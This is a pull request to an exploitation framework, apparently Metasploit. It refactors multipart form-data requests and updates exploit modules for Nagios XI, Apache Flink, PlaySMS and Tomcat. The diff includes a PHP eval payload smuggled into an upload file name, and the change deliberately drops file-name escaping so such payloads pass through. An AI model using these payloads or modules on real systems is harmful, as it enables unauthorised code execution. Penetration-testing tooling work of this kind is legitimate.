### PR TITLE
Update form data api defaults

### DIFF
--- a/lib/rex/proto/http/client_request.rb
+++ b/lib/rex/proto/http/client_request.rb
@@ -177,7 +177,8 @@ class ClientRequest
 
           content_disposition = 'form-data'
           content_disposition << "; name=\"#{field_name}\"" if field_name
-          content_disposition << "; filename=\"#{::CGI.escape(filename)}\"" if filename
+          # NOTE: The file name is intentionally unescaped, as exploits such as playsms_filename_exec embed payloads into the file name which shouldn't be escaped
+          content_disposition << "; filename=\"#{filename}\"" if filename
 
           form_data.add_part(file_contents, mime_type, encoding, content_disposition)
         end

--- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -204,10 +204,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload_root_shell
     vars_form_data = [
-      { 'name' => 'nsp', 'data' => @csrf_token, 'encoding' => nil, 'filename' => nil, 'mime_type' => nil },
-      { 'name' => 'upload', 'data' => 1, 'encoding' => nil, 'filename' => nil, 'mime_type' => nil },
-      { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000, 'encoding' => nil, 'filename' => nil, 'mime_type' => nil },
-      { 'name' => 'uploadedfile', 'data' => payload_zip, 'mime_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }
+      { 'name' => 'nsp', 'data' => @csrf_token },
+      { 'name' => 'upload', 'data' => 1 },
+      { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000 },
+      { 'name' => 'uploadedfile', 'data' => payload_zip, 'content_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }
     ]
 
     res = send_request_cgi!(

--- a/modules/exploits/multi/http/apache_flink_jar_upload_exec.rb
+++ b/modules/exploits/multi/http/apache_flink_jar_upload_exec.rb
@@ -98,13 +98,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def upload_jar(filename, data)
-    post_data = Rex::MIME::Message.new
-    post_data.add_part(data, 'application/x-java-archive', 'binary', "form-data; name=\"jarfile\"; filename=\"#{filename}\"")
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'jars', 'upload'),
       'method' => 'POST',
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-      'data' => post_data.to_s
+      'vars_form_data' => [
+        {
+          'name' => 'jarfile',
+          'data' => data,
+          'filename' => filename,
+          'content_type' => 'application/x-java-archive',
+          'encoding' => 'binary'
+        }
+      ]
     )
   end
 

--- a/modules/exploits/multi/http/playsms_filename_exec.rb
+++ b/modules/exploits/multi/http/playsms_filename_exec.rb
@@ -159,12 +159,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Payload.
     evilname = "<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>"
 
-    # setup POST request.
-    post_data = Rex::MIME::Message.new
-    post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
-    post_data.add_part("#{rand_text_alpha(8 + rand(5))}", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"")  # payload
-    post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"')  # extra
-    data = post_data.to_s
+    form_data = [
+      # CSRF token
+      { 'name' => 'X-CSRF-Token', 'data' => csrf },
+      # payload
+      { 'name' => 'fncsv', 'content_type' => 'application/octet-stream', 'data' => "#{rand_text_alpha(8 + rand(5))}", 'filename' => evilname },
+      # extra
+      { 'name' => 'fncsv_dup', 'data' => '1' }
+    ]
 
     vprint_status('Trying to upload file with malicious Filename Field....')
     # Lets Send Upload request.
@@ -182,8 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Upgrade-Insecure-Requests' => '1',
       },
       'Connection' => 'close',
-      'data' => data,
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'vars_form_data' => form_data
     })
   end
 end

--- a/modules/exploits/multi/http/playsms_uploadcsv_exec.rb
+++ b/modules/exploits/multi/http/playsms_uploadcsv_exec.rb
@@ -164,10 +164,12 @@ class MetasploitModule < Msf::Exploit::Remote
     final_csv = "Name,Email,Department\n"
     final_csv << "#{evil},#{rand(1..100)},#{rand(1..100)}"
     # setup POST request.
-    post_data = Rex::MIME::Message.new
-    post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
-    post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name="fnpb"; filename="agent22.csv"')  #payload
-    data = post_data.to_s
+    form_data = [
+      # CSRF token
+      { 'name' => 'X-CSRF-Token', 'data' => csrf },
+      # Payload
+      { 'name' => 'fnpb', 'data' => final_csv, 'content_type' => 'text/csv', 'filename' => 'agent22.csv' }
+    ]
 
     vprint_status('Trying to upload malicious CSV file ....')
     # Lets Send Upload request.
@@ -186,8 +188,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Upgrade-Insecure-Requests' => '1',
       },
       'Connection' => 'close',
-      'data' => data,
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'vars_form_data' => form_data
     })
   end
 end

--- a/modules/exploits/multi/http/tomcat_mgr_upload.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb
@@ -222,7 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return vars
   end
 
-  
   def detect_platform(body)
     return nil if body.blank?
 
@@ -296,20 +295,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return ""
   end
 
-  def generate_multipart_msg(boundary, data)
-    # Rex::MIME::Message is breaking the binary upload when trying to
-    # enforce CRLF for SMTP compatibility
-    war_multipart = "-----------------------------"
-    war_multipart << boundary
-    war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
-    war_multipart << @app_base
-    war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
-    war_multipart << data
-    war_multipart << "\r\n-----------------------------"
-    war_multipart << boundary
-    war_multipart << "--\r\n"
-  end
-
   def war_payload
     payload.encoded_war({
       :app_name => @app_base,
@@ -320,20 +305,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_war_payload(url, war)
-    boundary_identifier = rand_text_numeric(28)
-
     res = send_request_cgi({
       'uri'          => url,
       'method'       => 'POST',
-      'ctype'        => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
       'user'         => datastore['HttpUsername'],
       'password'     => datastore['HttpPassword'],
       'cookie'       => @session_id,
       'vars_get'     => vars_get,
-      'data'         => generate_multipart_msg(boundary_identifier, war),
+      'vars_form_data' => [
+        {
+          'name' => 'deployWar',
+          'filename' => "#{@app_base}.war",
+          'content_type' => 'application/octet-stream',
+          'data' => war,
+          'encoding' => 'binary'
+        }
+      ]
     })
 
-    return res
+    res
   end
 
   def send_request_undeploy(url)

--- a/spec/lib/rex/proto/http/client_spec.rb
+++ b/spec/lib/rex/proto/http/client_spec.rb
@@ -645,7 +645,7 @@ RSpec.describe Rex::Proto::Http::Client do
       expect(request.to_s).to eq(expected)
     end
 
-    it 'should escape special characters in file names correctly without encoding' do
+    it 'does not encode special characters in file name by default as it may be used as part of an exploit' do
       vars_form_data = [
         { 'name' => 'file', 'data' => 'abc', 'content_type' => 'text/plain', 'encoding' => '8bit', 'filename' => "'t \"e 'st.txt'" }
       ]
@@ -657,38 +657,12 @@ RSpec.describe Rex::Proto::Http::Client do
         Host: #{ip}\r
         User-Agent: #{request.opts['agent']}\r
         Content-Type: multipart/form-data; boundary=---------------------------MockBoundary1234\r
-        Content-Length: 242\r
+        Content-Length: 234\r
         \r
         -----------------------------MockBoundary1234\r
-        Content-Disposition: form-data; name="file"; filename="%27t+%22e+%27st.txt%27"\r
+        Content-Disposition: form-data; name="file"; filename="'t \"e 'st.txt'"\r
         Content-Type: text/plain\r
         Content-Transfer-Encoding: 8bit\r
-        \r
-        abc\r
-        -----------------------------MockBoundary1234--\r
-      EOF
-
-      expect(request.to_s).to eq(expected)
-    end
-
-    it 'should escape special characters in file names correctly with encoding' do
-      vars_form_data = [
-        { 'name' => 'file', 'data' => 'abc', 'filename' => "'t \"e 'st.txt'", 'content_type' => 'text/plain', 'encoding' => 'base64' }
-      ]
-
-      request = cli.request_cgi({ 'vars_form_data' => vars_form_data })
-
-      expected = <<~EOF
-        POST / HTTP/1.1\r
-        Host: #{ip}\r
-        User-Agent: #{request.opts['agent']}\r
-        Content-Type: multipart/form-data; boundary=---------------------------MockBoundary1234\r
-        Content-Length: 244\r
-        \r
-        -----------------------------MockBoundary1234\r
-        Content-Disposition: form-data; name="file"; filename="%27t+%22e+%27st.txt%27"\r
-        Content-Type: text/plain\r
-        Content-Transfer-Encoding: base64\r
         \r
         abc\r
         -----------------------------MockBoundary1234--\r


### PR DESCRIPTION
Updates the API To:
- Remove the 8bit defaults from `form_data` as it's not common. The default is assumed to be 7bit. This means by default we'll make HTTP requests that are more aligned with what the browser would send by default.
- rename `mime_type` to `content_type` for consistency with the http header. Although I left `encoding` as-is.
- No longer ignore invalid form names, but to instead raise an exception
- Update nagios module to no longer need to explicitly override `nil` on most options
- Add a test for empty vars_form_data, as otherwise we would get form data metadata by default which was invalid
- Require users to explicitly specify filename, unless it can be inferred from the file object passed in
- Remove filename encoding, as some exploits put payloads here
- Update more modules to use the new api